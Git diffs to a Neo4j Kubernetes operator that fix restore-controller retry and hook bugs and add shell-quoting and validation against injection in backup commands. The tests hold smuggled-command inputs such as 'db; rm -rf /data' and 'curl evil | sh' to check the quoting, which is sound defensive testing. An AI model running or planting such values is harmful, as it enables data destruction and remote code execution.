+	noAuth := standaloneAsCluster(&neo4jv1beta1.Neo4jEnterpriseStandalone{
+		ObjectMeta: metav1.ObjectMeta{Name: "sa", Namespace: "ns"},
+	})
+	assert.Equal(t, DefaultAdminSecretName, restoreAdminSecretName(noAuth))
+
+	withAuth := &neo4jv1beta1.Neo4jEnterpriseCluster{
+		Spec: neo4jv1beta1.Neo4jEnterpriseClusterSpec{
+			Auth: &neo4jv1beta1.AuthSpec{AdminSecret: "custom-secret"},
+		},
+	}
+	assert.Equal(t, "custom-secret", restoreAdminSecretName(withAuth))
+}

--- a/internal/controller/neo4jrestore_cloud_test.go
+++ b/internal/controller/neo4jrestore_cloud_test.go
@@ -936,3 +936,56 @@ func TestRestoreAdminSecretName(t *testing.T) {
 	}
 	assert.Equal(t, "custom-secret", restoreAdminSecretName(withAuth))
 }
+
+// TestHookJobSpecForPhase pins #218: the phase strings used by callers and
+// the hook lookup must agree — the historical "pre-restore" vs "pre" mismatch
+// made every spec.options.*.job hook a silent no-op.
+func TestHookJobSpecForPhase(t *testing.T) {
+	pre := &neo4jv1beta1.RestoreHookJob{}
+	post := &neo4jv1beta1.RestoreHookJob{}
+	restore := &neo4jv1beta1.Neo4jRestore{
+		Spec: neo4jv1beta1.Neo4jRestoreSpec{
+			Options: &neo4jv1beta1.RestoreOptionsSpec{
+				PreRestore:  &neo4jv1beta1.RestoreHooks{Job: pre},
+				PostRestore: &neo4jv1beta1.RestoreHooks{Job: post},
+			},
+		},
+	}
+	assert.Same(t, pre, hookJobSpecForPhase(restore, hookPhasePreRestore))
+	assert.Same(t, post, hookJobSpecForPhase(restore, hookPhasePostRestore))
+	assert.Nil(t, hookJobSpecForPhase(restore, "pre"), "legacy short phase must not match")
+	assert.Nil(t, hookJobSpecForPhase(&neo4jv1beta1.Neo4jRestore{}, hookPhasePreRestore))
+}
+
+// TestClearStaleRestoreAttemptState pins the #218 retry-semantics helpers: a
+// fresh attempt clears the one-shot recreate marker and a retargeted
+// backupRef drops the pinned source.
+func TestClearStaleRestoreAttemptState(t *testing.T) {
+	restore := &neo4jv1beta1.Neo4jRestore{
+		ObjectMeta: metav1.ObjectMeta{
+			Name: "r", Namespace: "ns",
+			Annotations: map[string]string{AnnotationCypherRestoreIssued: "2026-01-01T00:00:00Z"},
+		},
+		Status: neo4jv1beta1.Neo4jRestoreStatus{
+			ResolvedSource: &neo4jv1beta1.ResolvedRestoreSource{
+				BackupRef: "old-backup",
+				Storage:   &neo4jv1beta1.StorageLocation{Type: "s3", Bucket: "b"},
+			},
+		},
+	}
+	fc := fake.NewClientBuilder().WithScheme(newTestScheme()).WithObjects(restore).WithStatusSubresource(restore).Build()
+	r := &Neo4jRestoreReconciler{Client: fc}
+
+	require.NoError(t, r.clearCypherRestoreIssued(context.Background(), restore))
+	require.NoError(t, r.clearResolvedSource(context.Background(), restore))
+
+	latest := &neo4jv1beta1.Neo4jRestore{}
+	require.NoError(t, fc.Get(context.Background(), types.NamespacedName{Name: "r", Namespace: "ns"}, latest))
+	_, hasAnno := latest.Annotations[AnnotationCypherRestoreIssued]
+	assert.False(t, hasAnno, "stale recreate marker must be cleared for a fresh attempt")
+	assert.Nil(t, latest.Status.ResolvedSource, "pinned source for the old backupRef must be dropped")
+
+	// Idempotent on already-clean objects.
+	require.NoError(t, r.clearCypherRestoreIssued(context.Background(), restore))
+	require.NoError(t, r.clearResolvedSource(context.Background(), restore))
+}

--- a/internal/controller/neo4jrestore_cloud_test.go
+++ b/internal/controller/neo4jrestore_cloud_test.go
@@ -819,3 +819,50 @@ func TestBuildLocalRestoreFilePath_EmptyDatabaseNameSkips(t *testing.T) {
 	got := buildLocalRestoreFilePath(restore, "/backup/x")
 	assert.Empty(t, got, "empty dbname must skip shell-side resolution")
 }
+
+// TestResolveRestoreSource_BackupRefEmptyStoragePathDefaulted pins #218: the
+// backup WRITE side (buildToPath) defaults an empty storage.path to
+// "backups", so the artifacts live at s3://bucket/backups/<chain>/. The
+// resolver must mirror that default — without it the restore read
+// s3://bucket/<chain>/ and every defaulted-path cloud backup was
+// unrestorable via backupRef (file-not-found with no hint).
+func TestResolveRestoreSource_BackupRefEmptyStoragePathDefaulted(t *testing.T) {
+	backup := &neo4jv1beta1.Neo4jBackup{
+		ObjectMeta: metav1.ObjectMeta{Name: "defaulted", Namespace: "neo4j"},
+		Spec: neo4jv1beta1.Neo4jBackupSpec{
+			Storage: neo4jv1beta1.StorageLocation{
+				Type:   "s3",
+				Bucket: "prod-bucket",
+				// Path deliberately empty — perfectly valid spec; the
+				// validator only requires bucket.
+				Cloud: &neo4jv1beta1.CloudBlock{Provider: "aws"},
+			},
+		},
+		Status: neo4jv1beta1.Neo4jBackupStatus{
+			History: []neo4jv1beta1.BackupRun{
+				{RunID: "run-1", Status: "Succeeded", BackupsPath: "defaulted"},
+			},
+		},
+	}
+	r := &Neo4jRestoreReconciler{
+		Client: fake.NewClientBuilder().WithScheme(newTestScheme()).WithObjects(backup).Build(),
+	}
+	restore := &neo4jv1beta1.Neo4jRestore{
+		ObjectMeta: metav1.ObjectMeta{Namespace: "neo4j"},
+		Spec: neo4jv1beta1.Neo4jRestoreSpec{
+			Source: neo4jv1beta1.RestoreSource{Type: "backup", BackupRef: "defaulted"},
+		},
+	}
+
+	src, err := r.resolveRestoreSource(context.Background(), restore)
+	require.NoError(t, err)
+	require.NotNil(t, src.Storage)
+	assert.Equal(t, "backups", src.Storage.Path,
+		"resolver must mirror buildToPath's empty-path default")
+
+	tmp := &neo4jv1beta1.Neo4jRestore{Spec: neo4jv1beta1.Neo4jRestoreSpec{Source: src}}
+	assert.Equal(t,
+		"s3://prod-bucket/backups/defaulted",
+		r.buildRestoreFromPath(tmp),
+		"restore must read from the SAME location the backup Job wrote to")
+}

--- a/internal/controller/neo4jrestore_controller.go
+++ b/internal/controller/neo4jrestore_controller.go
@@ -287,8 +287,12 @@ func (r *Neo4jRestoreReconciler) startRestore(ctx context.Context, restore *neo4
 		return r.startClusterCypherRestore(ctx, restore, cluster)
 	}
 
-	// Check if database exists and handle accordingly
-	if !restore.Spec.Force {
+	// Check if database exists and handle accordingly. Skipped when THIS
+	// restore already stopped the instance on a previous reconcile (re-entry
+	// via a Pending route, #218): the Bolt connection would fail against the
+	// scaled-to-0 instance and pin a terminal Failed — and the check already
+	// passed before the stop.
+	if !restore.Spec.Force && !r.restoreAlreadyStoppedInstance(ctx, restore, cluster) {
 		if err := r.checkDatabaseExists(ctx, restore, cluster); err != nil {
 			logger.Error(err, "Database existence check failed")
 			r.updateRestoreStatus(ctx, restore, StatusFailed, fmt.Sprintf("Database check failed: %v", err))
@@ -333,6 +337,10 @@ func (r *Neo4jRestoreReconciler) startRestore(ctx context.Context, restore *neo4
 	if restore.Spec.Options != nil && restore.Spec.Options.PreRestore != nil {
 		if err := r.runRestoreHooks(ctx, restore, cluster, restore.Spec.Options.PreRestore, "pre-restore"); err != nil {
 			logger.Error(err, "Pre-restore hooks failed")
+			// The instance may already be scaled to 0 by stopCluster above;
+			// a terminal Failed without recovery would strand it there with
+			// the restore-in-progress annotation held (#218).
+			r.restoreClusterAfterFailure(ctx, restore, cluster)
 			r.updateRestoreStatus(ctx, restore, StatusFailed, fmt.Sprintf("Pre-restore hooks failed: %v", err))
 			return ctrl.Result{RequeueAfter: r.RequeueAfter}, err
 		}
@@ -347,13 +355,19 @@ func (r *Neo4jRestoreReconciler) startRestore(ctx context.Context, restore *neo4
 		// requeues) instead of Failed (which the guard pins as
 		// terminal until the CR is recreated). The restore will
 		// auto-promote to Running once the backup's history gains a
-		// Succeeded entry on a future reconcile.
+		// Succeeded entry on a future reconcile. The instance stays
+		// stopped (stopCluster already ran); the eventual retry re-enters
+		// startRestore, where stopCluster's write-if-absent annotation
+		// handling keeps the original replica count intact (#218).
 		if stderrors.Is(err, errBackupNotReady) {
 			logger.Info("Restore is waiting for the referenced backup to complete", "error", err.Error())
 			r.updateRestoreStatus(ctx, restore, StatusPending, fmt.Sprintf("Waiting for backup to complete: %v", err))
 			return ctrl.Result{RequeueAfter: r.RequeueAfter}, nil
 		}
 		logger.Error(err, "Failed to create restore job")
+		// Terminal failure after a successful stopCluster: scale the
+		// instance back up and release the annotation (#218).
+		r.restoreClusterAfterFailure(ctx, restore, cluster)
 		r.updateRestoreStatus(ctx, restore, StatusFailed, fmt.Sprintf("Failed to create restore job: %v", err))
 		return ctrl.Result{RequeueAfter: r.RequeueAfter}, err
 	}
@@ -1803,6 +1817,20 @@ func (r *Neo4jRestoreReconciler) refuseRestoreIfPodsRunning(ctx context.Context,
 // sts.Spec.Replicas (issue #117). If the annotation is already set to a
 // different restore, returns an error — two restores against the same cluster
 // cannot run concurrently.
+// restoreAlreadyStoppedInstance reports whether THIS restore already holds
+// the in-progress marker on the target standalone — i.e. a previous reconcile
+// stopped the instance and startRestore is re-entering (e.g. via a Pending
+// route while the referenced backup finishes). Bolt-based preflights are
+// impossible against the stopped instance — and unnecessary: they passed
+// before the stop (#218).
+func (r *Neo4jRestoreReconciler) restoreAlreadyStoppedInstance(ctx context.Context, restore *neo4jv1beta1.Neo4jRestore, cluster *neo4jv1beta1.Neo4jEnterpriseCluster) bool {
+	sa := &neo4jv1beta1.Neo4jEnterpriseStandalone{}
+	if err := r.Get(ctx, client.ObjectKeyFromObject(cluster), sa); err != nil {
+		return false
+	}
+	return sa.Annotations[RestoreInProgressAnnotation] == restore.Name
+}
+
 func (r *Neo4jRestoreReconciler) setRestoreInProgressAnnotation(ctx context.Context, restore *neo4jv1beta1.Neo4jRestore, cluster *neo4jv1beta1.Neo4jEnterpriseCluster) error {
 	return retry.RetryOnConflict(retry.DefaultBackoff, func() error {
 		// The Job restore path is standalone-only (clusters use the Cypher
@@ -1878,11 +1906,19 @@ func (r *Neo4jRestoreReconciler) stopCluster(ctx context.Context, cluster *neo4j
 	originalReplicas := *sts.Spec.Replicas
 	sts.Spec.Replicas = ptr.To(int32(0))
 
-	// Store original replica count in annotation for later restoration
+	// Store the original replica count for later restoration — but ONLY if
+	// not already recorded (#218). startRestore can re-enter after a
+	// successful stop (e.g. a Pending route while the referenced backup
+	// finishes); by then the live replica count is 0, and overwriting the
+	// annotation with "0" would make startCluster "restore" zero replicas —
+	// the instance never comes back. Mirrors startCluster's tolerance of a
+	// missing annotation (rule 46).
 	if sts.Annotations == nil {
 		sts.Annotations = make(map[string]string)
 	}
-	sts.Annotations["neo4j.neo4j.com/original-replicas"] = fmt.Sprintf("%d", originalReplicas)
+	if _, recorded := sts.Annotations["neo4j.neo4j.com/original-replicas"]; !recorded {
+		sts.Annotations["neo4j.neo4j.com/original-replicas"] = fmt.Sprintf("%d", originalReplicas)
+	}
 
 	if err := r.Update(ctx, sts); err != nil {
 		return fmt.Errorf("failed to scale down StatefulSet: %w", err)

--- a/internal/controller/neo4jrestore_controller.go
+++ b/internal/controller/neo4jrestore_controller.go
@@ -900,7 +900,8 @@ func (r *Neo4jRestoreReconciler) createRestoreJob(ctx context.Context, restore *
 										ValueFrom: &corev1.EnvVarSource{
 											SecretKeyRef: &corev1.SecretKeySelector{
 												LocalObjectReference: corev1.LocalObjectReference{
-													Name: cluster.Spec.Auth.AdminSecret,
+													// nil-safe: standalone targets may omit spec.auth (#218).
+													Name: restoreAdminSecretName(cluster),
 												},
 												Key: "password",
 											},
@@ -2441,6 +2442,19 @@ func (r *Neo4jRestoreReconciler) startClusterCypherRestore(
 			restore.Spec.DatabaseName, ternaryString(exists, "recreate", "create"), seedURI))
 
 	if exists {
+		// Recreating an EXISTING database wipes and replaces its contents —
+		// destructive by definition. Gate on the same explicit opt-in the
+		// standalone Job path requires (#218): without it, a typo'd
+		// databaseName against a cluster target silently overwrote a live
+		// database with backup contents.
+		if !restore.Spec.Force && (restore.Spec.Options == nil || !restore.Spec.Options.ReplaceExisting) {
+			msg := fmt.Sprintf(
+				"database %q already exists on the target cluster; a restore would WIPE and replace it. Set spec.force=true (or spec.options.replaceExisting=true) to confirm, or restore to a different databaseName",
+				restore.Spec.DatabaseName)
+			r.updateRestoreStatus(ctx, restore, StatusFailed, msg)
+			r.Recorder.Event(restore, corev1.EventTypeWarning, EventReasonRestoreFailed, msg)
+			return ctrl.Result{}, fmt.Errorf("%s", msg)
+		}
 		// `dbms.recreateDatabase` is ASYNCHRONOUS — it returns as soon as the
 		// recreate is scheduled, long before the per-server seed-from-URI
 		// finishes. We therefore must NOT block the reconcile worker on a
@@ -2802,8 +2816,19 @@ func (r *Neo4jRestoreReconciler) isRestoreTargetTrueCluster(ctx context.Context,
 	return false, nil, nil
 }
 
+// restoreAdminSecretName resolves the admin Secret for a restore target.
+// `cluster` may be a standaloneAsCluster wrapper whose Auth block is nil
+// (legal on Neo4jEnterpriseStandalone — the secret name has a default
+// everywhere else); dereferencing it unguarded panicked the reconciler (#218).
+func restoreAdminSecretName(cluster *neo4jv1beta1.Neo4jEnterpriseCluster) string {
+	if cluster.Spec.Auth != nil && cluster.Spec.Auth.AdminSecret != "" {
+		return cluster.Spec.Auth.AdminSecret
+	}
+	return DefaultAdminSecretName
+}
+
 func (r *Neo4jRestoreReconciler) createNeo4jClient(_ context.Context, cluster *neo4jv1beta1.Neo4jEnterpriseCluster) (*neo4j.Client, error) {
-	return neo4j.NewClientForEnterprise(cluster, r.Client, cluster.Spec.Auth.AdminSecret)
+	return neo4j.NewClientForEnterprise(cluster, r.Client, restoreAdminSecretName(cluster))
 }
 
 // newStandaloneRestoreClient builds a Bolt client for the Neo4jEnterpriseStandalone

--- a/internal/controller/neo4jrestore_controller.go
+++ b/internal/controller/neo4jrestore_controller.go
@@ -248,6 +248,34 @@ func (r *Neo4jRestoreReconciler) handleDeletion(ctx context.Context, restore *ne
 func (r *Neo4jRestoreReconciler) startRestore(ctx context.Context, restore *neo4jv1beta1.Neo4jRestore, cluster *neo4jv1beta1.Neo4jEnterpriseCluster) (ctrl.Result, error) {
 	logger := log.FromContext(ctx)
 
+	// Fresh attempt detection (#218). The documented retry path for a
+	// Completed/Failed restore is "bump the spec" (new generation), but two
+	// pieces of one-shot state from the PREVIOUS attempt survived and broke
+	// it:
+	//  1. The cypher-restore-issued annotation short-circuited the new
+	//     attempt straight into pollClusterRestoreOnline — which either
+	//     insta-Completed (the database is online from the previous restore;
+	//     nothing re-restored) or insta-Failed (deadline anchored at the old
+	//     timestamp, long expired).
+	//  2. A pinned status.resolvedSource for a DIFFERENT backupRef always won
+	//     over the new spec value, so retargeting the restore was silently
+	//     ignored.
+	if restore.Status.ObservedGeneration != 0 && restore.Status.ObservedGeneration != restore.Generation {
+		if err := r.clearCypherRestoreIssued(ctx, restore); err != nil {
+			logger.Error(err, "Failed to clear stale cypher-restore-issued annotation")
+			return ctrl.Result{RequeueAfter: r.RequeueAfter}, err
+		}
+	}
+	if snap := resolvedBackupSnapshot(restore); snap != nil &&
+		restore.Spec.Source.Type == SourceTypeBackup && snap.BackupRef != restore.Spec.Source.BackupRef {
+		logger.Info("spec.source.backupRef changed; invalidating the pinned resolved source",
+			"pinned", snap.BackupRef, "current", restore.Spec.Source.BackupRef)
+		if err := r.clearResolvedSource(ctx, restore); err != nil {
+			logger.Error(err, "Failed to clear stale resolved source")
+			return ctrl.Result{RequeueAfter: r.RequeueAfter}, err
+		}
+	}
+
 	// Set start time
 	now := metav1.Now()
 	restore.Status.StartTime = &now
@@ -300,6 +328,20 @@ func (r *Neo4jRestoreReconciler) startRestore(ctx context.Context, restore *neo4
 		}
 	}
 
+	// Run pre-restore hooks BEFORE the instance is stopped (#218): Cypher
+	// hooks (e.g. CALL db.checkpoint()) need a live Bolt endpoint, and the
+	// previous post-stop placement made them fail unconditionally under
+	// stopCluster=true. Skipped on re-entry once THIS restore has already
+	// stopped the instance — they ran on the first pass.
+	if restore.Spec.Options != nil && restore.Spec.Options.PreRestore != nil &&
+		!r.restoreAlreadyStoppedInstance(ctx, restore, cluster) {
+		if err := r.runRestoreHooks(ctx, restore, cluster, restore.Spec.Options.PreRestore, hookPhasePreRestore); err != nil {
+			logger.Error(err, "Pre-restore hooks failed")
+			r.updateRestoreStatus(ctx, restore, StatusFailed, fmt.Sprintf("Pre-restore hooks failed: %v", err))
+			return ctrl.Result{RequeueAfter: r.RequeueAfter}, err
+		}
+	}
+
 	// Stop cluster if required
 	if restore.Spec.StopCluster {
 		// Mark the cluster as having a restore in progress BEFORE scaling
@@ -330,19 +372,6 @@ func (r *Neo4jRestoreReconciler) startRestore(ctx context.Context, restore *neo4
 			logger.Error(err, "Refusing restore against running cluster")
 			r.updateRestoreStatus(ctx, restore, StatusFailed, err.Error())
 			return ctrl.Result{}, err
-		}
-	}
-
-	// Run pre-restore hooks
-	if restore.Spec.Options != nil && restore.Spec.Options.PreRestore != nil {
-		if err := r.runRestoreHooks(ctx, restore, cluster, restore.Spec.Options.PreRestore, "pre-restore"); err != nil {
-			logger.Error(err, "Pre-restore hooks failed")
-			// The instance may already be scaled to 0 by stopCluster above;
-			// a terminal Failed without recovery would strand it there with
-			// the restore-in-progress annotation held (#218).
-			r.restoreClusterAfterFailure(ctx, restore, cluster)
-			r.updateRestoreStatus(ctx, restore, StatusFailed, fmt.Sprintf("Pre-restore hooks failed: %v", err))
-			return ctrl.Result{RequeueAfter: r.RequeueAfter}, err
 		}
 	}
 
@@ -514,20 +543,22 @@ func (r *Neo4jRestoreReconciler) handleRestoreSuccess(ctx context.Context, resto
 		}
 	}
 
-	// Run post-restore hooks
-	if restore.Spec.Options != nil && restore.Spec.Options.PostRestore != nil {
-		if err := r.runRestoreHooks(ctx, restore, cluster, restore.Spec.Options.PostRestore, "post-restore"); err != nil {
-			logger.Error(err, "Post-restore hooks failed")
-			r.updateRestoreStatus(ctx, restore, StatusFailed, fmt.Sprintf("Post-restore hooks failed: %v", err))
-			return ctrl.Result{RequeueAfter: r.RequeueAfter}, err
-		}
-	}
-
 	// Register the restored database with Neo4j so it becomes accessible
 	if err := r.createOrStartDatabase(ctx, restore, cluster); err != nil {
 		logger.Error(err, "Failed to create/start database after restore")
 		r.Recorder.Event(restore, corev1.EventTypeWarning, EventReasonDatabaseCreateFailed,
 			fmt.Sprintf("Restore succeeded but failed to create database %q: %v", restore.Spec.DatabaseName, err))
+	}
+
+	// Run post-restore hooks AFTER the database is registered/started (#218):
+	// Cypher hooks (e.g. CALL db.awaitIndexes()) target the restored database
+	// — running them before createOrStartDatabase hit a stopped or absent DB.
+	if restore.Spec.Options != nil && restore.Spec.Options.PostRestore != nil {
+		if err := r.runRestoreHooks(ctx, restore, cluster, restore.Spec.Options.PostRestore, hookPhasePostRestore); err != nil {
+			logger.Error(err, "Post-restore hooks failed")
+			r.updateRestoreStatus(ctx, restore, StatusFailed, fmt.Sprintf("Post-restore hooks failed: %v", err))
+			return ctrl.Result{RequeueAfter: r.RequeueAfter}, err
+		}
 	}
 
 	// For multi-server clusters, force all servers to re-seed the
@@ -2087,9 +2118,14 @@ func (r *Neo4jRestoreReconciler) runRestoreHooks(ctx context.Context, restore *n
 	logger := log.FromContext(ctx)
 	logger.Info("Running restore hooks", "restore", restore.Name, "phase", phase)
 
-	// Execute Cypher statements if any
+	// Execute Cypher statements if any. Hooks only run on the standalone
+	// Job path (the cluster Cypher path never invokes them), so the Bolt
+	// client must target the standalone's service — createNeo4jClient
+	// builds the cluster "<name>-client" routing URI, which doesn't exist
+	// for a standalone target and made every Cypher hook fail (#218, the
+	// #187 service-naming class).
 	if len(hooks.CypherStatements) > 0 {
-		neo4jClient, err := r.createNeo4jClient(ctx, cluster)
+		neo4jClient, err := r.newStandaloneRestoreClient(ctx, restore)
 		if err != nil {
 			return fmt.Errorf("failed to create Neo4j client for hooks: %w", err)
 		}
@@ -2116,18 +2152,41 @@ func (r *Neo4jRestoreReconciler) runRestoreHooks(ctx context.Context, restore *n
 	return nil
 }
 
+// Hook phase identifiers. A single source of truth: callers and the
+// hookSpec lookup in runHookJob MUST agree — they previously didn't
+// (callers passed "pre-restore"/"post-restore", the lookup matched
+// "pre"/"post"), so hookSpec was always nil and spec.options.*.job hooks
+// were a silent no-op (#218).
+const (
+	hookPhasePreRestore  = "pre-restore"
+	hookPhasePostRestore = "post-restore"
+)
+
+// hookJobSpecForPhase resolves the Job hook configured for a phase. Pure so
+// the phase agreement between callers and this lookup stays pinned by a unit
+// test — the historical mismatch made all Job hooks a silent no-op (#218).
+func hookJobSpecForPhase(restore *neo4jv1beta1.Neo4jRestore, phase string) *neo4jv1beta1.RestoreHookJob {
+	if restore.Spec.Options == nil {
+		return nil
+	}
+	switch phase {
+	case hookPhasePreRestore:
+		if restore.Spec.Options.PreRestore != nil {
+			return restore.Spec.Options.PreRestore.Job
+		}
+	case hookPhasePostRestore:
+		if restore.Spec.Options.PostRestore != nil {
+			return restore.Spec.Options.PostRestore.Job
+		}
+	}
+	return nil
+}
+
 func (r *Neo4jRestoreReconciler) runHookJob(ctx context.Context, restore *neo4jv1beta1.Neo4jRestore, phase string) error {
 	logger := log.FromContext(ctx)
 	logger.Info("Running hook job", "restore", restore.Name, "phase", phase)
 
-	// Get hook configuration based on phase
-	var hookSpec *neo4jv1beta1.RestoreHookJob
-	if phase == "pre" && restore.Spec.Options != nil && restore.Spec.Options.PreRestore != nil {
-		hookSpec = restore.Spec.Options.PreRestore.Job
-	} else if phase == "post" && restore.Spec.Options != nil && restore.Spec.Options.PostRestore != nil {
-		hookSpec = restore.Spec.Options.PostRestore.Job
-	}
-
+	hookSpec := hookJobSpecForPhase(restore, phase)
 	if hookSpec == nil {
 		return nil // No hook job configured
 	}
@@ -2168,8 +2227,22 @@ func (r *Neo4jRestoreReconciler) runHookJob(ctx context.Context, restore *neo4jv
 		job.Spec.BackoffLimit = ptr.To(int32(3))
 	}
 
+	// Owner-ref the hook Job to the restore CR so it is GC'd with it —
+	// cleanupRestoreJobs only matches component=restore, not hooks (#218).
+	if err := controllerutil.SetControllerReference(restore, job, r.Scheme); err != nil {
+		return fmt.Errorf("failed to set hook job owner reference: %w", err)
+	}
+
 	if err := r.Create(ctx, job); err != nil {
-		return fmt.Errorf("failed to create hook job: %w", err)
+		if errors.IsAlreadyExists(err) {
+			// Re-entry (e.g. after a transient status-write failure): adopt
+			// the existing hook Job and wait on it.
+			if getErr := r.Get(ctx, client.ObjectKeyFromObject(job), job); getErr != nil {
+				return fmt.Errorf("failed to adopt existing hook job: %w", getErr)
+			}
+		} else {
+			return fmt.Errorf("failed to create hook job: %w", err)
+		}
 	}
 
 	// Determine timeout
@@ -2194,12 +2267,14 @@ func (r *Neo4jRestoreReconciler) runHookJob(ctx context.Context, restore *neo4jv
 				return fmt.Errorf("failed to get hook job status: %w", err)
 			}
 
-			if job.Status.Succeeded > 0 {
+			if jobConditionTrue(job, batchv1.JobComplete) || job.Status.Succeeded > 0 {
 				logger.Info("Hook job completed successfully")
 				return nil
 			}
 
-			if job.Status.Failed > 0 {
+			// JobFailed CONDITION, not the Failed pod counter — the counter is
+			// >0 while the Job retries a transient pod failure (#217 class).
+			if jobConditionTrue(job, batchv1.JobFailed) {
 				return fmt.Errorf("hook job failed")
 			}
 
@@ -2543,6 +2618,49 @@ func (r *Neo4jRestoreReconciler) markCypherRestoreIssued(ctx context.Context, re
 	if _, ok := restore.Annotations[AnnotationCypherRestoreIssued]; !ok {
 		restore.Annotations[AnnotationCypherRestoreIssued] = stamp
 	}
+	return nil
+}
+
+// clearCypherRestoreIssued removes the one-shot recreate marker so a fresh
+// attempt (spec bump after Completed/Failed) re-issues the restore instead of
+// short-circuiting into the poll phase with stale state (#218). Idempotent.
+func (r *Neo4jRestoreReconciler) clearCypherRestoreIssued(ctx context.Context, restore *neo4jv1beta1.Neo4jRestore) error {
+	err := retry.RetryOnConflict(retry.DefaultBackoff, func() error {
+		latest := &neo4jv1beta1.Neo4jRestore{}
+		if err := r.Get(ctx, client.ObjectKeyFromObject(restore), latest); err != nil {
+			return err
+		}
+		if _, ok := latest.Annotations[AnnotationCypherRestoreIssued]; !ok {
+			return nil
+		}
+		delete(latest.Annotations, AnnotationCypherRestoreIssued)
+		return r.Update(ctx, latest)
+	})
+	if err != nil {
+		return err
+	}
+	delete(restore.Annotations, AnnotationCypherRestoreIssued)
+	return nil
+}
+
+// clearResolvedSource drops the pinned status.resolvedSource so the next
+// resolution re-dereferences the CURRENT spec.source.backupRef (#218).
+func (r *Neo4jRestoreReconciler) clearResolvedSource(ctx context.Context, restore *neo4jv1beta1.Neo4jRestore) error {
+	err := retry.RetryOnConflict(retry.DefaultBackoff, func() error {
+		latest := &neo4jv1beta1.Neo4jRestore{}
+		if err := r.Get(ctx, client.ObjectKeyFromObject(restore), latest); err != nil {
+			return err
+		}
+		if latest.Status.ResolvedSource == nil {
+			return nil
+		}
+		latest.Status.ResolvedSource = nil
+		return r.Status().Update(ctx, latest)
+	})
+	if err != nil {
+		return err
+	}
+	restore.Status.ResolvedSource = nil
 	return nil
 }
 

--- a/internal/neo4j/version.go
+++ b/internal/neo4j/version.go
@@ -178,7 +178,14 @@ func GetBackupCommand(version *Version, databaseName string, backupPath string, 
 	if fromAddresses != "" {
 		cmd += " --from=" + fromAddresses
 	}
-	cmd += " --to-path=" + backupPath
+	// backupPath is assembled from user-controlled spec fields
+	// (storage.bucket, storage.path, chainFromBackup) and the whole command
+	// runs via `/bin/sh -c` in a pod holding cloud credentials — single-quote
+	// it so no metacharacter in those fields can escape into the shell
+	// (defense-in-depth; the validator also rejects suspicious charsets).
+	// Unlike GetRestoreCommand's from-path, to-path is never a deliberate
+	// command substitution, so unconditional quoting is safe.
+	cmd += " --to-path=" + shellQuoteArg(backupPath)
 
 	if allDatabases {
 		cmd += ` "*"`

--- a/internal/neo4j/version_test.go
+++ b/internal/neo4j/version_test.go
@@ -202,7 +202,7 @@ func TestGetBackupCommand(t *testing.T) {
 	v, _ := ParseVersion("5.26.0-enterprise")
 
 	cmd := GetBackupCommand(v, "mydb", "/backups/mydb", false, "")
-	if !containsStr(cmd, "--to-path=/backups/mydb") {
+	if !containsStr(cmd, "--to-path='/backups/mydb'") {
 		t.Errorf("expected --to-path flag in backup command: %q", cmd)
 	}
 	if !containsStr(cmd, "mydb") {
@@ -484,5 +484,22 @@ func TestGetRestoreCommand_QuotesDatabaseName(t *testing.T) {
 	evil := GetRestoreCommand(v, "db; rm -rf /data", "/backups/x")
 	if !containsStr(evil, `'db; rm -rf /data'`) {
 		t.Errorf("expected metacharacters contained within quotes, got: %q", evil)
+	}
+}
+
+// TestGetBackupCommand_ToPathShellInjectionGuard pins #219: the to-path is
+// assembled from user-controlled spec fields (storage.bucket, storage.path,
+// chainFromBackup) and the command runs via /bin/sh -c in a pod holding cloud
+// credentials — metacharacters must not escape into the shell.
+func TestGetBackupCommand_ToPathShellInjectionGuard(t *testing.T) {
+	v := &Version{Major: 5, Minor: 26}
+	cmd := GetBackupCommand(v, "mydb", `s3://bucket/x; curl evil | sh; /chain/`, false, "")
+	if !containsStr(cmd, `--to-path='s3://bucket/x; curl evil | sh; /chain/'`) {
+		t.Errorf("to-path must be single-quoted so metacharacters stay literal, got: %q", cmd)
+	}
+	// Embedded single quote can't break out of the quoting.
+	cmd = GetBackupCommand(v, "mydb", `/backup/a'b`, false, "")
+	if !containsStr(cmd, `--to-path='/backup/a'\''b'`) {
+		t.Errorf("embedded single quote must be escaped, got: %q", cmd)
 	}
 }

--- a/internal/validation/backup_validator.go
+++ b/internal/validation/backup_validator.go
@@ -24,6 +24,7 @@ import (
 	"time"
 
 	cron "github.com/robfig/cron/v3"
+	apivalidation "k8s.io/apimachinery/pkg/api/validation"
 	"k8s.io/apimachinery/pkg/util/validation/field"
 
 	neo4jv1beta1 "github.com/neo4j-partners/neo4j-kubernetes-operator/api/v1beta1"
@@ -140,6 +141,30 @@ func (v *BackupValidator) Validate(backup *neo4jv1beta1.Neo4jBackup) field.Error
 		))
 	}
 
+	// chainFromBackup names another Neo4jBackup CR and feeds the Job command's
+	// path segment — constrain it to a DNS-1123 label (#219). The CronJob path
+	// builds its command before validateChainParent's existence check, so a
+	// shell-metacharacter value must be rejected up front.
+	if backup.Spec.ChainFromBackup != "" {
+		if msgs := apivalidation.NameIsDNSSubdomain(backup.Spec.ChainFromBackup, false); len(msgs) > 0 {
+			allErrs = append(allErrs, field.Invalid(
+				field.NewPath("spec", "chainFromBackup"),
+				backup.Spec.ChainFromBackup,
+				"must be a valid resource name: "+msgs[0],
+			))
+		}
+	}
+
+	// tempPath is interpolated into the Job's /bin/sh -c command (#219).
+	if backup.Spec.Options != nil && backup.Spec.Options.TempPath != "" {
+		tp := backup.Spec.Options.TempPath
+		if !strings.HasPrefix(tp, "/") || !storageShellSafe.MatchString(tp) {
+			allErrs = append(allErrs, field.Invalid(
+				field.NewPath("spec", "options", "tempPath"), tp,
+				"must be an absolute path containing only letters, digits, '.', '_', '-' and '/'"))
+		}
+	}
+
 	return allErrs
 }
 
@@ -247,8 +272,30 @@ func (v *BackupValidator) validateStorageConfiguration(storage *neo4jv1beta1.Sto
 		))
 	}
 
+	// Charset fail-fast for fields interpolated into the backup Job's
+	// `/bin/sh -c` command (#219). The command builder also shell-quotes
+	// them (defense-in-depth); rejecting suspicious input here surfaces a
+	// clear phase=Invalid instead of a runtime neo4j-admin error.
+	if storage.Bucket != "" && !storageShellSafe.MatchString(storage.Bucket) {
+		allErrs = append(allErrs, field.Invalid(
+			storagePath.Child("bucket"), storage.Bucket,
+			"bucket may only contain letters, digits, '.', '_', '-' and '/'"))
+	}
+	if storage.Path != "" && !storageShellSafe.MatchString(storage.Path) {
+		allErrs = append(allErrs, field.Invalid(
+			storagePath.Child("path"), storage.Path,
+			"path may only contain letters, digits, '.', '_', '-' and '/'"))
+	}
+
 	return allErrs
 }
+
